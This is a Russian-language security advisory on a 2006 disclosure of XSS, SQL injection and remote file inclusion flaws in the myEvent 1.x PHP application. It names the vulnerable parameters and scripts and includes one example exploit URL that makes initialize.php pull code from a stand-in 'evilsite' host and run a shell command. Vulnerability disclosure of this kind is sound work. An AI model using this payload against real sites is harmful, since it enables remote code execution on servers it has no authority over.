Security Lab

Множественные уязвимости в myEvent

Дата публикации:19.04.2006
Всего просмотров:3424
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2006-1890
CVE-2006-1907
CVE-2006-1908
CVE-2006-4040
CVE-2006-4083
CVE-2008-4650
Вектор эксплуатации: Удаленная
Воздействие: Неавторизованное изменение данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: myEvent 1.x
Уязвимые версии: myEvent 1.x

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, SQL-инъекцию и скомпрометировать уязвимую систему.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "event_desc" в сценарии addevent.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "event_id" в сценариях addevent.php и del.php, и параметре "event_desc" в сценарии addevent.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "myevent_path" в сценариях myevent.php и initialize.php, и параметре "myevent_path" в сценариях event.php и viewevent.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера.

Удачная эксплуатация уязвимости возможна при включенной опции "register_globals" и выключенной "magic_quotes_gpc". Пример:

http://victim/[path]/initialize.php?myevent_path=http://www.evilsite.com/x.txt?&cmd=uname -a

URL производителя: http://mywebland.com/download.php?id=6

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: MyEvent Remote File Execution And XSS Attacking